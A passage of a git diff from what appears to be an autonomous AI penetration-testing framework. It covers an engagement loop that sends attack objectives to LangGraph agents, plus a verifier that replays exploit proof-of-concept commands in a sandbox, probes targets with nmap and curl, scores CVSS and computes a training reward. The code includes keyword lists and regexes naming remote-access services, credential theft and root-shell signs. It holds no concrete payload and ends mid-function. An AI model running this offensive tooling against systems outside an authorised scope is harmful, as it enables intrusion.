CheckPhase.PRE_DEFENSE) + evidence = await self._verifier.verify_blocked(spec, pre=pre, post=post) + reward = self._verifier.compute_reward(evidence) + self._verifier.persist_evidence(evidence) + self._verifier.persist_reward(reward) + return VerificationResult( + finding_ref=finding_ref, + defense_actions_applied=[], + re_attack_outcome=evidence.re_attack_outcome, + re_attack_details=( + f"env-verified reward={reward.reward:.1f} " + f"poc_hash={evidence.poc_evidence.output_hash}" + ), + ) + return self._load_verification_result(finding_ref) + + def _scan_findings(self) -> list[str]: + """Scan workspace/findings/ for FIND-*.md files. + + Returns a sorted list of finding refs (e.g. ``["FIND-001", "FIND-002"]``). + """ + findings_dir = self._workspace / "findings" + if not findings_dir.is_dir(): + log.debug("Findings directory does not exist: %s", findings_dir) + return [] + refs = sorted(p.stem for p in findings_dir.glob("FIND-*.md")) + log.debug("Scanned %d finding(s) from %s", len(refs), findings_dir) + return refs + + def _load_verification_result(self, finding_ref: str) -> VerificationResult | None: + """Load workspace/verification-{finding_ref}.json if it exists.""" + result_path = self._workspace / f"verification-{finding_ref}.json" + if not result_path.exists(): + log.debug("Verification result not found: %s", result_path) + return None + try: + data = json.loads(result_path.read_text(encoding="utf-8")) + return VerificationResult.model_validate(data) + except (OSError, ValueError) as exc: + log.error("Failed to load verification result %s: %s", result_path, exc) + return None + + def _generate_defense_brief(self, finding_ref: str) -> DefenseBrief | None: + """Parse a finding markdown file and produce a structured DefenseBrief. + + Returns ``None`` only when the finding file cannot be read. + Falls back to safe defaults when optional fields are absent. + """ + finding_path = self._workspace / "findings" / f"{finding_ref}.md" + if not finding_path.exists(): + log.warning("Finding file not found: %s", finding_path) + return None + try: + content = finding_path.read_text(encoding="utf-8") + except OSError as exc: + log.error("Could not read finding %s: %s", finding_path, exc) + return None + + lines = content.splitlines() + title = "Unknown Finding" + severity = "medium" + attack_vector = "" + affected_assets: list[str] = [] + evidence_summary = "" + + # Title: first H1 heading + for line in lines: + stripped = line.strip() + if stripped.startswith("# "): + title = stripped[2:].strip() + break + + # Severity: line containing "**Severity**:" or "Severity:" + for line in lines: + lower = line.lower() + if "severity" in lower and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2: + candidate = parts[1].strip().strip("*").strip().lower() + if candidate in {"critical", "high", "medium", "low", "informational"}: + severity = candidate + break + + # Attack vector: line containing "Attack Vector:" or a following paragraph + capture_vector = False + vector_lines: list[str] = [] + for line in lines: + lower = line.lower() + if "attack vector" in lower and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2 and parts[1].strip(): + vector_lines = [parts[1].strip()] + break + capture_vector = True + continue + if capture_vector: + stripped = line.strip() + if stripped.startswith("#") or (stripped.startswith("**") and ":" in stripped): + break + if stripped: + vector_lines.append(stripped) + if len(vector_lines) >= 3: + break + if vector_lines: + attack_vector = " ".join(vector_lines) + + # Affected assets: lines under "**Affected**:" or "**Assets**:" + capture_assets = False + for line in lines: + lower = line.lower() + if ("affected" in lower or "assets" in lower) and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2 and parts[1].strip(): + for asset in parts[1].split(","): + asset = asset.strip() + if asset: + affected_assets.append(asset) + break + capture_assets = True + continue + if capture_assets: + stripped = line.strip() + if stripped.startswith("#") or (stripped.startswith("**") and ":" in stripped): + break + if stripped.startswith("-") or stripped.startswith("*"): + asset = stripped.lstrip("-* ").strip() + if asset: + affected_assets.append(asset) + + # Evidence summary: first non-empty line after "## Evidence" heading + capture_evidence = False + for line in lines: + stripped = line.strip() + if stripped.lower() in {"## evidence", "### evidence"}: + capture_evidence = True + continue + if capture_evidence: + if stripped.startswith("#"): + break + if stripped: + evidence_summary = stripped + break + + recommended_actions = self._infer_recommendations(attack_vector, severity) + + return DefenseBrief( + finding_ref=finding_ref, + finding_title=title, + severity=severity, + attack_vector=attack_vector, + affected_assets=affected_assets, + recommended_actions=recommended_actions, + evidence_summary=evidence_summary, + ) + + def _infer_recommendations( + self, attack_vector: str, severity: str + ) -> list[DefenseRecommendation]: + """Infer defensive recommendations from attack vector keywords.""" + lower = attack_vector.lower() + recommendations: list[DefenseRecommendation] = [] + priority = 1 + + if any(kw in lower for kw in ("port", "tcp", "udp", "service", "listen")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.BLOCK_PORT, + target="affected-port", + priority=priority, + rationale=( + "Attack vector references a network port or listening service — " + "block inbound access as an immediate containment measure" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("ssh", "ftp", "telnet", "smb", "rdp", "vnc")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.DISABLE_SERVICE, + target="affected-service", + priority=priority, + rationale=( + "Attack vector references a remote-access protocol — " + "disable or harden the service to remove the attack surface" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("credential", "password", "token", "key", "secret", "auth")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.REVOKE_CREDENTIAL, + target="compromised-credential", + priority=priority, + rationale=( + "Attack vector involves credentials or authentication — " + "revoke and rotate affected credentials immediately" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("config", "misconfigur", "permission", "acl", "setting")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.UPDATE_CONFIG, + target="affected-config", + priority=priority, + rationale=( + "Attack vector references a misconfiguration — " + "update the relevant configuration to enforce secure defaults" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("process", "pid", "daemon", "spawn", "exec")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.KILL_PROCESS, + target="affected-process", + priority=priority, + rationale=( + "Attack vector involves a running process — " + "terminate the process to halt active exploitation" + ), + ) + ) + priority += 1 + + # Always recommend a firewall rule for critical/high findings with no other actions + if severity in {"critical", "high"} and not recommendations: + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.ADD_FIREWALL_RULE, + target="affected-host", + priority=1, + rationale=( + f"High-severity finding ({severity}) with no specific vector keywords — " + "add a restrictive firewall rule as a precautionary measure" + ), + ) + ) + + return recommendations + + def _select_agent(self, objective: Objective) -> str: + """Map objective phase to a LangGraph assistant_id.""" + return self._config.agent_selection.get(objective.phase.value, "recon") + + async def _invoke_agent(self, agent_name: str, prompt: str) -> str: + """POST a run to the LangGraph API and return the final message content. + + Uses httpx (async, lightweight) to avoid hard dependency on langgraph_sdk. + If the API is unreachable the error is logged and an error string is + returned — the loop continues rather than crashing. + """ + thread_id = str(uuid.uuid4()) + url = f"{self._config.langgraph_url}/runs" + payload = { + "assistant_id": agent_name, + "thread_id": thread_id, + "input": {"messages": [{"role": "human", "content": prompt}]}, + } + + log.info("Invoking agent: name=%s thread=%s url=%s", agent_name, thread_id, url) + + try: + async with httpx.AsyncClient(timeout=600.0) as client: + response = await client.post(url, json=payload) + response.raise_for_status() + data = response.json() + + # Extract the final assistant message from the run result + output = self._extract_message(data) + log.debug("Agent %s responded (%.80s...)", agent_name, output) + return output + + except httpx.ConnectError as exc: + msg = f"[API_UNREACHABLE] Could not connect to LangGraph at {self._config.langgraph_url}: {exc}" + log.error(msg) + return msg + except httpx.HTTPStatusError as exc: + msg = f"[API_ERROR] LangGraph returned {exc.response.status_code}: {exc.response.text[:200]}" + log.error(msg) + return msg + except Exception as exc: + msg = f"[INVOKE_ERROR] Unexpected error invoking {agent_name}: {exc}" + log.error(msg) + return msg + + def _extract_message(self, data: object) -> str: + """Extract the final assistant message text from a LangGraph run response.""" + if not isinstance(data, dict): + return str(data) + + # LangGraph run result: {"output": {"messages": [...]}} + output = data.get("output") or data + if isinstance(output, dict): + messages = output.get("messages", []) + if isinstance(messages, list): + for msg in reversed(messages): + if isinstance(msg, dict) and msg.get("type") == "ai": + content = msg.get("content", "") + if isinstance(content, str): + return content + if isinstance(content, list): + parts = [ + c.get("text", "") + for c in content + if isinstance(c, dict) and c.get("type") == "text" + ] + return " ".join(p for p in parts if p) + + return json.dumps(data) + + def _build_attack_prompt(self, objective: Objective) -> str: + """Build the per-iteration prompt injected into the fresh agent context.""" + assert self._state is not None + + # Summarize prior findings from disk — include title for sub-agent context + findings_dir = self._workspace / "findings" + prior_findings: list[str] = [] + if findings_dir.is_dir(): + for p in sorted(findings_dir.glob("FIND-*.md")): + title = "" + try: + for line in p.read_text(encoding="utf-8").splitlines(): + if line.startswith("# "): + title = line[2:].strip() + break + except OSError: + pass # state persist failure is non-fatal + prior_findings.append(f"{p.stem}: {title}" if title else p.stem) + + roe_path = self._workspace / "plan" / "roe.json" + roe_scope = "" + if roe_path.exists(): + try: + roe_data = json.loads(roe_path.read_text(encoding="utf-8")) + in_scope = roe_data.get("in_scope", []) + out_of_scope = roe_data.get("out_of_scope", []) + roe_scope = ( + f"In-scope: {', '.join(str(s) for s in in_scope) or 'all'}\n" + f"Out-of-scope: {', '.join(str(s) for s in out_of_scope) or 'none'}" + ) + except (OSError, ValueError) as exc: + log.warning("Could not read RoE: %s", exc) + + criteria_block = "\n".join(f" - {c}" for c in objective.acceptance_criteria) + findings_block = ( + "\n".join(f" - {f}" for f in prior_findings) if prior_findings else " none yet" + ) + + return ( + f"## Ralph Iteration {self._state.iteration}\n\n" + f"Workspace: {self._workspace}\n" + f"Target: {self._config.target}\n\n" + f"### Current Objective\n" + f"ID: {objective.id}\n" + f"Phase: {objective.phase.value}\n" + f"Title: {objective.title}\n" + f"Description: {objective.description}\n" + f"OPSEC: {objective.opsec.value}" + + (f" — {objective.opsec_notes}" if objective.opsec_notes else "") + + f"\n" + f"Acceptance Criteria:\n{criteria_block}\n\n" + f"### Prior Findings\n" + f"{findings_block}\n\n" + + (f"### Rules of Engagement\n{roe_scope}\n\n" if roe_scope else "") + + "Execute the objective. Write findings to workspace/findings/FIND-NNN.md. " + "Signal OBJECTIVE PASSED or OBJECTIVE BLOCKED when done." + ) + + def _next_pending_objective(self) -> Objective | None: + """Return the highest-priority pending objective whose dependencies are met.""" + if self._opplan is None: + return None + + completed_ids = set(self._state.objectives_completed) if self._state else set() + + candidates = [ + obj + for obj in self._opplan.objectives + if obj.status == ObjectiveStatus.PENDING + and all(dep in completed_ids for dep in obj.blocked_by) + ] + + if not candidates: + return None + + return min(candidates, key=lambda o: o.priority) + + def _parse_objective_result( + self, + response: str, + objective: Objective, + agent: str, + start: float, + ) -> IterationResult: + """Parse OBJECTIVE PASSED/BLOCKED signal and FIND-NNN refs from agent response.""" + upper = response.upper() + + if "OBJECTIVE PASSED" in upper: + outcome = "PASSED" + elif "OBJECTIVE BLOCKED" in upper: + outcome = "BLOCKED" + else: + # No explicit signal — treat as blocked so the loop doesn't stall + outcome = "BLOCKED" + log.warning( + "Objective %s: no PASSED/BLOCKED signal in response — defaulting to BLOCKED", + objective.id, + ) + + # Extract FIND-NNN references + findings = re.findall(r"\bFIND-\d{3,}\b", response) + unique_findings = list(dict.fromkeys(findings)) # preserve order, deduplicate + + return IterationResult( + objective_id=objective.id, + agent_used=agent, + outcome=outcome, + findings_produced=unique_findings, + duration_seconds=round(time.time() - start, 2), + raw_output=response, + ) + + def _load_opplan(self) -> OPPLAN | None: + """Read and validate workspace/plan/opplan.json.""" + opplan_path = self._workspace / "plan" / "opplan.json" + if not opplan_path.exists(): + log.debug("opplan.json not found at %s", opplan_path) + return None + try: + data = json.loads(opplan_path.read_text(encoding="utf-8")) + return OPPLAN.model_validate(data) + except (OSError, ValueError) as exc: + log.error("Failed to load opplan.json: %s", exc) + return None + + def _update_opplan_objective(self, obj_id: str, status: ObjectiveStatus) -> None: + """Load opplan, update one objective's status, and write back to disk.""" + opplan_path = self._workspace / "plan" / "opplan.json" + if not opplan_path.exists(): + log.warning("Cannot update objective %s — opplan.json missing", obj_id) + return + try: + data = json.loads(opplan_path.read_text(encoding="utf-8")) + updated = False + for obj in data.get("objectives", []): + if obj.get("id") == obj_id: + obj["status"] = status.value + updated = True + break + if updated: + opplan_path.write_text(json.dumps(data, indent=2), encoding="utf-8") + log.debug("Updated objective %s → %s", obj_id, status.value) + else: + log.warning("Objective %s not found in opplan.json", obj_id) + except (OSError, ValueError) as exc: + log.error("Failed to update opplan objective %s: %s", obj_id, exc) + + def _recover_stale_objectives(self) -> None: + """Reset any IN_PROGRESS objectives back to PENDING. + + The engagement loop marks an objective IN_PROGRESS, invokes the agent, + then updates to COMPLETED or BLOCKED. If the process crashes between + the first and second write, the objective is left orphaned at + IN_PROGRESS. _next_pending_objective() only considers PENDING + objectives, so the orphan is never retried. + + On startup, scan and reset so the loop can pick them up again. + """ + if self._opplan is None: + return + stale = [o for o in self._opplan.objectives if o.status == ObjectiveStatus.IN_PROGRESS] + if not stale: + return + log.warning( + "Resetting %d stale IN_PROGRESS objective(s) to PENDING: %s", + len(stale), + ", ".join(o.id for o in stale), + ) + for obj in stale: + self._update_opplan_objective(obj.id, ObjectiveStatus.PENDING) + + +# ── Convenience entry point ──────────────────────────────────────────────────── + + +async def run_engagement( + workspace: str | Path, + config: EngagementConfig | None = None, +) -> EngagementState: + """Entry point for the engagement loop. + + Args: + workspace: Path to the engagement workspace directory. + config: Engagement configuration. If ``None``, a default config is used + with ``target="unknown"`` — suitable for resuming an existing + engagement where the target is already recorded in state. + + Returns: + The final :class:`EngagementState` after the loop completes. + """ + workspace = Path(workspace) + workspace.mkdir(parents=True, exist_ok=True) + if config is None: + config = EngagementConfig(target="unknown") + loop = EngagementLoop(workspace, config) + return await loop.run() diff --git a/decepticon/core/env_verifier.py b/decepticon/core/env_verifier.py new file mode 100644 index 00000000..e803f53d --- /dev/null +++ b/decepticon/core/env_verifier.py @@ -0,0 +1,727 @@ +"""Independent environment verifier — no LLM in the verification path.""" + +from __future__ import annotations + +import hashlib +import json +import logging +import math +import re +import time +from pathlib import Path +from typing import Any + +from decepticon.schemas.defense_brief import ReAttackOutcome +from decepticon.schemas.env_verification import ( + BaselineEvidence, + CheckPhase, + CVSSEstimate, + EnvironmentSnapshot, + PoCConsensus, + PoCEvidence, + PoCRunResult, + RLVRReward, + TargetCheckResult, + VerificationEvidence, +) +from decepticon.schemas.exploit_spec import ( + CommandOutputCheck, + CredentialCheck, + ExploitSpec, + FileCheck, + PortCheck, + ServiceCheck, + TargetCheck, +) +from decepticon.tools.research.poc import PoCRunner, _hash_output, _match_signals + +log = logging.getLogger("decepticon.core.env_verifier") + + +# CVSS 3.1 metric weights +_CVSS_AV: dict[str, float] = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2} +_CVSS_AC: dict[str, float] = {"L": 0.77, "H": 0.44} +_CVSS_PR_U: dict[str, float] = {"N": 0.85, "L": 0.62, "H": 0.27} +_CVSS_PR_C: dict[str, float] = {"N": 0.85, "L": 0.68, "H": 0.50} +_CVSS_UI: dict[str, float] = {"N": 0.85, "R": 0.62} +_CVSS_CIA: dict[str, float] = {"N": 0.0, "L": 0.22, "H": 0.56} + + +def _cvss_roundup(value: float) -> float: + """Round up to nearest 0.1 per CVSS 3.1 spec.""" + int_val = int(round(value * 100000)) + if int_val % 10000 == 0: + return int_val / 100000.0 + return (math.floor(int_val / 10000.0) + 1) / 10.0 + + +class EnvironmentVerifier: + """Replays ExploitSpec against the sandbox to produce grounded RLVRReward. + + No LLM is in the verification path. All reward signal comes from: + - PoC command exit code + regex signal matching + - Environment probe flips (pre → post defense) + - ZFP negative control demotion + """ + + def __init__( + self, + workspace: Path, + runner: PoCRunner, + http_session: Any = None, + ) -> None: + self._workspace = workspace + self._runner = runner + self._http = http_session + + # ── Spec I/O ────────────────────────────────────────────────────────── + + def load_spec(self, finding_ref: str) -> ExploitSpec | None: + path = self._workspace / "findings" / f"{finding_ref}-exploit-spec.json" + if not path.exists(): + return None + try: + return ExploitSpec.model_validate_json(path.read_text(encoding="utf-8")) + except Exception as exc: + log.warning("Could not load exploit spec for %s: %s", finding_ref, exc) + return None + + def load_snapshot(self, finding_ref: str, phase: CheckPhase) -> EnvironmentSnapshot | None: + path = self._workspace / "verification" / f"{finding_ref}-{phase.value}-snapshot.json" + if not path.exists(): + return None + try: + return EnvironmentSnapshot.model_validate_json(path.read_text(encoding="utf-8")) + except Exception as exc: + log.warning("Could not load snapshot %s/%s: %s", finding_ref, phase, exc) + return None + + # ── Environment probing ─────────────────────────────────────────────── + + async def capture_state(self, spec: ExploitSpec, phase: CheckPhase) -> EnvironmentSnapshot: + results: list[TargetCheckResult] = [] + for i, check in enumerate(spec.target_checks): + check_id = f"{spec.finding_ref}-{phase.value}-{i}" + result = await self._run_check(check_id, check, phase) + results.append(result) + return EnvironmentSnapshot( + finding_ref=spec.finding_ref, + phase=phase, + results=results, + captured_at=time.time(), + ) + + async def _run_check( + self, check_id: str, check: TargetCheck, phase: CheckPhase + ) -> TargetCheckResult: + try: + if isinstance(check, PortCheck): + return await self._check_port(check_id, check, phase) + elif isinstance(check, ServiceCheck): + return await self._check_service(check_id, check, phase) + elif isinstance(check, (CredentialCheck, CommandOutputCheck)): + return await self._check_command(check_id, check, phase) + elif isinstance(check, FileCheck): + return await self._check_file(check_id, check, phase) + else: + return TargetCheckResult( + check_id=check_id, + kind="unknown", + phase=phase, + signal={}, + positive=False, + raw_excerpt="unknown check kind", + ) + except Exception as exc: + log.warning("Check %s failed: %s", check_id, exc) + return TargetCheckResult( + check_id=check_id, + kind=getattr(check, "kind", "unknown"), + phase=phase, + signal={"error": str(exc)}, + positive=False, + raw_excerpt=str(exc)[:500], + ) + + async def _check_port( + self, check_id: str, check: PortCheck, phase: CheckPhase + ) -> TargetCheckResult: + cmd = f"nmap -p {check.port} {check.host} --open -oG - 2>/dev/null | grep -c 'open'" + stdout, stderr, _code = await self._runner(cmd) + combined = f"{stdout}\n{stderr}" + is_open = bool(re.search(r"[1-9]", stdout.strip())) + return TargetCheckResult( + check_id=check_id, + kind="port", + phase=phase, + signal={"host": check.host, "port": check.port, "open": is_open}, + positive=is_open, + raw_excerpt=combined[:500], + ) + + async def _check_service( + self, check_id: str, check: ServiceCheck, phase: CheckPhase + ) -> TargetCheckResult: + cmd = f"curl -s -o /tmp/_svc_check -w '%{{http_code}}' --max-time 10 {check.url!r}" + stdout, _stderr, _code = await self._runner(cmd) + status_str = stdout.strip() + try: + status = int(status_str) + except ValueError: + status = 0 + status_ok = status == check.expected_status + body_ok = True + raw = "" + if check.body_pattern: + body_stdout, _, _ = await self._runner("cat /tmp/_svc_check 2>/dev/null || true") + raw = body_stdout[:500] + body_ok = bool(re.search(check.body_pattern, body_stdout, re.DOTALL | re.IGNORECASE)) + positive = status_ok and body_ok + return TargetCheckResult( + check_id=check_id, + kind="service", + phase=phase, + signal={"url": check.url, "status": status, "body_match": body_ok}, + positive=positive, + raw_excerpt=raw or status_str, + ) + + async def _check_command( + self, + check_id: str, + check: CredentialCheck | CommandOutputCheck, + phase: CheckPhase, + ) -> TargetCheckResult: + cmd = check.command + pattern = check.success_pattern if isinstance(check, CredentialCheck) else check.pattern + expect = True if isinstance(check, CredentialCheck) else check.expect_match + stdout, stderr, code = await self._runner(cmd) + combined = f"{stdout}\n{stderr}" + matched = bool(re.search(pattern, combined, re.DOTALL | re.IGNORECASE)) + positive = matched if expect else not matched + return TargetCheckResult( + check_id=check_id, + kind=check.kind, + phase=phase, + signal={"matched": matched, "expect_match": expect, "exit_code": code}, + positive=positive, + raw_excerpt=combined[:500], + ) + + async def _check_file( + self, check_id: str, check: FileCheck, phase: CheckPhase + ) -> TargetCheckResult: + stdout, _, _ = await self._runner(f"test -f {check.path!r} && echo EXISTS || echo MISSING") + exists = "EXISTS" in stdout + exists_ok = exists == check.must_exist + content_ok = True + raw = "" + if check.content_pattern and exists: + cat_out, _, _ = await self._runner(f"cat {check.path!r} 2>/dev/null || true") + raw = cat_out[:500] + content_ok = bool(re.search(check.content_pattern, cat_out, re.DOTALL | re.IGNORECASE)) + positive = exists_ok and content_ok + return TargetCheckResult( + check_id=check_id, + kind="file", + phase=phase, + signal={ + "path": check.path, + "exists": exists, + "content_match": content_ok, + }, + positive=positive, + raw_excerpt=raw or stdout[:200], + ) + + # ── PoC consensus ───────────────────────────────────────────────────── + + async def _run_poc_once(self, spec: ExploitSpec, run_index: int) -> PoCRunResult: + stdout, stderr, exit_code = await self._runner(spec.poc_command) + combined = f"{stdout}\n{stderr}" + signals = _match_signals(combined, spec.success_patterns) + return PoCRunResult( + run_index=run_index, + exit_code=exit_code, + signals_matched=signals, + output_hash=_hash_output(stdout, stderr, exit_code), + stdout_excerpt=stdout[:1600], + stderr_excerpt=stderr[:800], + succeeded=len(signals) > 0, + ) + + async def _run_poc_consensus(self, spec: ExploitSpec) -> PoCConsensus: + run_results: list[PoCRunResult] = [] + for i in range(spec.runs): + result = await self._run_poc_once(spec, i) + run_results.append(result) + + n_success = sum(1 for r in run_results if r.succeeded) + success_rate = n_success / spec.runs + + successful_signal_sets = [set(r.signals_matched) for r in run_results if r.succeeded] + agreed_signals: list[str] = [] + if successful_signal_sets: + agreed_signals = list(set.intersection(*successful_signal_sets)) + + zfp_demoted = False + if spec.negative_command and agreed_signals: + n_out, n_err, _ = await self._runner(spec.negative_command) + n_combined = f"{n_out}\n{n_err}" + if _match_signals(n_combined, spec.success_patterns): + log.warning("%s: ZFP demotion — negative control matched", spec.finding_ref) + zfp_demoted = True + agreed_signals = [] + + return PoCConsensus( + n_runs=spec.runs, + n_success=n_success, + success_rate=success_rate, + agreed_signals=agreed_signals, + zfp_demoted=zfp_demoted, + run_results=run_results, + ) + + async def verify_baseline(self, spec: ExploitSpec) -> BaselineEvidence: + consensus = await self._run_poc_consensus(spec) + valid = ( + not consensus.zfp_demoted + and consensus.success_rate >= spec.min_success_rate + and len(consensus.agreed_signals) > 0 + ) + if not valid: + log.warning( + "%s: baseline PoC invalid (rate=%.2f zfp=%s signals=%s)", + spec.finding_ref, + consensus.success_rate, + consensus.zfp_demoted, + consensus.agreed_signals, + ) + return BaselineEvidence( + finding_ref=spec.finding_ref, + valid=valid, + consensus=consensus, + ) + + # ── Impact + inconclusive + CVSS ────────────────────────────────────── + + def _match_impact_patterns(self, spec: ExploitSpec, combined: str) -> list[str]: + if not spec.impact_patterns: + return [] + return _match_signals(combined, spec.impact_patterns) + + def _check_inconclusive( + self, pre: EnvironmentSnapshot | None, post: EnvironmentSnapshot + ) -> bool: + if pre is None or len(pre.results) < 2: + return False + host_port_map: dict[str, bool] = {} + host_service_map: dict[str, bool] = {} + + for result in post.results: + sig = result.signal + if result.kind == "port": + key = f"{sig.get('host')}:{sig.get('port')}" + host_port_map[key] = result.positive + elif result.kind == "service": + url = str(sig.get("url", "")) + host = url.split("/")[2] if "/" in url else url + host_service_map[host] = result.positive + + for url_host, svc_positive in host_service_map.items(): + for port_key, port_positive in host_port_map.items(): + if port_key.startswith(url_host) and svc_positive != port_positive: + return True + return False + + def _estimate_cvss( + self, + spec: ExploitSpec, + consensus: PoCConsensus, + pre: EnvironmentSnapshot | None, + post: EnvironmentSnapshot, + ) -> CVSSEstimate: + # Default: network attack vector if any port/service check, else local + attack_vector = "L" + for check in spec.target_checks: + if isinstance(check, (PortCheck, ServiceCheck)): + attack_vector = "N" + break + + attack_complexity = "L" + privileges_required = "N" + user_interaction = "N" + scope = "U" + + # Credentials needed → privs required low + for check in spec.target_checks: + if isinstance(check, CredentialCheck): + privileges_required = "L" + break + + confidentiality = "N" + integrity = "N" + availability = "N" + + # Inspect impact patterns to derive CIA + impact_blob = " ".join(spec.impact_patterns) + if re.search(r"uid=0|root:|SYSTEM", impact_blob, re.IGNORECASE): + confidentiality = "H" + integrity = "H" + scope = "C" + if re.search(r"email|password|secret|key|token", impact_blob, re.IGNORECASE): + confidentiality = "H" + if re.search(r"RCE|exec|shell|cmd", impact_blob, re.IGNORECASE): + integrity = "H" + availability = "H" + + # No impact patterns → low impact + if not spec.impact_patterns: + confidentiality = "L" if consensus.agreed_signals else "N" + + c = _CVSS_CIA[confidentiality] + i_val = _CVSS_CIA[integrity] + a = _CVSS_CIA[availability] + isc_base = 1 - (1 - c) * (1 - i_val) * (1 - a) + if scope == "U": + impact_sub = 6.42 * isc_base + pr_weight = _CVSS_PR_U[privileges_required] + else: + impact_sub = 7.52 * (isc_base - 0.029) - 3.25 * (isc_base - 0.02) ** 15 + pr_weight = _CVSS_PR_C[privileges_required] + + exploitability = ( + 8.22 + * _CVSS_AV[attack_vector] + * _CVSS_AC[attack_complexity] + * pr_weight + * _CVSS_UI[user_interaction] + ) + + if impact_sub <= 0: + base_score = 0.0 + else: + if scope == "U": + base_score = _cvss_roundup(min(10.0, impact_sub + exploitability)) + else: + base_score = _cvss_roundup(min(10.0, 1.08 * (impact_sub + exploitability))) + + vector = ( + f"CVSS:3.1/AV:{attack_vector}/AC:{attack_complexity}/PR:{privileges_required}" + f"/UI:{user_interaction}/S:{scope}/C:{confidentiality}/I:{integrity}/A:{availability}" + ) + + return CVSSEstimate( + attack_vector=attack_vector, + attack_complexity=attack_complexity, + privileges_required=privileges_required, + user_interaction=user_interaction, + scope=scope, + confidentiality=confidentiality, + integrity=integrity, + availability=availability, + base_score=base_score, + vector_string=vector, + ) + + # ── Dedup ───────────────────────────────────────────────────────────── + + def _compute_fingerprint(self, spec: ExploitSpec) -> str: + parts = [ + spec.poc_command.strip(), + ",".join(sorted(spec.success_patterns)), + spec.target_host or "", + ] + return hashlib.sha256("|".join(parts).encode()).hexdigest()[:16] + + def _dedup_path(self) -> Path: + return self._workspace / "rlvr" / "dedup.jsonl" + + def is_duplicate(self, spec: ExploitSpec) -> bool: + path = self._dedup_path() + if not path.exists(): + return False + fp = self._compute_fingerprint(spec) + try: + for line in path.read_text(encoding="utf-8").splitlines(): + if not line.strip(): + continue + try: + entry = json.loads(line) + except json.JSONDecodeError: + continue + if entry.get("fingerprint") == fp and entry.get("finding_ref") != spec.finding_ref: + return True + except OSError: + return False + return False + + def _get_duplicate_ref(self, spec: ExploitSpec) -> str | None: + path = self._dedup_path() + if not path.exists(): + return None + fp = self._compute_fingerprint(spec) + try: + for line in path.read_text(encoding="utf-8").splitlines(): + if not line.strip(): + continue + try: + entry = json.loads(line) + except json.JSONDecodeError: + continue + if entry.get("fingerprint") == fp and entry.get("finding_ref") != spec.finding_ref: + ref = entry.get("finding_ref") + return str(ref) if ref is not None else None + except OSError: + return None + return None + + def _register_fingerprint(self, spec: ExploitSpec) -> None: + path = self._dedup_path() + path.parent.mkdir(parents=True, exist_ok=True) + entry = { + "fingerprint": self._compute_fingerprint(spec), + "finding_ref": spec.finding_ref, + "registered_at": time.time(), + } + with path.open("a", encoding="utf-8") as f: + f.write(json.dumps(entry) + "\n") + + # ── Verification entrypoint ─────────────────────────────────────────── + + async def verify_blocked( + self, + spec: ExploitSpec, + pre: EnvironmentSnapshot | None, + post: EnvironmentSnapshot, + baseline: BaselineEvidence | None = None, + ) -> VerificationEvidence: + # 1. Check duplicate + is_dup = self.is_duplicate(spec) + dup_ref: str | None = None + if is_dup: + dup_ref = self._get_duplicate_ref(spec) + log.info("%s: duplicate of %s — skipping PoC re-run", spec.finding_ref, dup_ref) + else: + self._register_fingerprint(spec) + + # 2. Baseline validity gate + baseline_valid = True + if baseline is not None: + baseline_valid = baseline.valid + + # 3. N-run consensus PoC + consensus = await self._run_poc_consensus(spec) + + # 4. Match impact patterns over all run output + all_run_output = "\n".join( + r.stdout_excerpt + r.stderr_excerpt for r in consensus.run_results + ) + impact_signals = self._match_impact_patterns(spec, all_run_output) + + # 5. Inconclusive check + inconclusive = self._check_inconclusive(pre, post) + + # 6. CVSS estimate + cvss = self._estimate_cvss(spec, consensus, pre, post) + + # 7. Build legacy PoCEvidence (backward compat) + best_run = max(consensus.run_results, key=lambda r: len(r.signals_matched), default=None) + legacy_poc = PoCEvidence( + exit_code=best_run.exit_code if best_run else -1, + success_signals_matched=consensus.agreed_signals, + zfp_demoted=consensus.zfp_demoted, + output_hash=best_run.output_hash if best_run else "", + stdout_excerpt=best_run.stdout_excerpt if best_run else "", + stderr_excerpt=best_run.stderr_excerpt if best_run else "", + ) + + # 8. Determine outcome + outcome = self._determine_outcome_v2( + consensus=consensus, + baseline_valid=baseline_valid, + inconclusive=inconclusive, + pre=pre, + post=post, + is_duplicate=is_dup, + success_rate_threshold=spec.min_success_rate, + ) + + return VerificationEvidence( + finding_ref=spec.finding_ref, + pre_snapshot=pre, + post_snapshot=post, + poc_evidence=legacy_poc, + re_attack_outcome=outcome, + verified_at=time.time(), + baseline_evidence=baseline, + consensus=consensus, + impact_signals_matched=impact_signals, + cvss_estimate=cvss, + duplicate_of=dup_ref, + baseline_valid=baseline_valid, + inconclusive=inconclusive, + ) + + def _determine_outcome( + self, + poc: PoCEvidence, + pre: EnvironmentSnapshot | None, + post: EnvironmentSnapshot, + ) -> ReAttackOutcome: + if poc.zfp_demoted: + return ReAttackOutcome.ERROR + if not poc.success_signals_matched: + return ReAttackOutcome.BLOCKED + # Signals still matched — check if any environment checks flipped + if pre is None: + return ReAttackOutcome.PASSED + post_positives = [r.positive for r in post.results] + pre_positives = [r.positive for r in pre.results] + flipped = sum(1 for p, q in zip(pre_positives, post_positives) if p and not q) + if 0 < flipped < len(pre_positives): + return ReAttackOutcome.PARTIAL + if flipped == len(pre_positives) and len(pre_positives) > 0: + return ReAttackOutcome.BLOCKED + return ReAttackOutcome.PASSED + + def _determine_outcome_v2( + self, + consensus: PoCConsensus, + baseline_valid: bool, + inconclusive: bool, + pre: EnvironmentSnapshot | None, + post: EnvironmentSnapshot, + is_duplicate: bool, + success_rate_threshold: float, + ) -> ReAttackOutcome: + if not baseline_valid: + return ReAttackOutcome.ERROR + if consensus.zfp_demoted: + return ReAttackOutcome.ERROR + if inconclusive: + return ReAttackOutcome.ERROR + if is_duplicate: + return ReAttackOutcome.ERROR + + if consensus.success_rate < success_rate_threshold and consensus.n_success > 0: + return ReAttackOutcome.PARTIAL + + if not 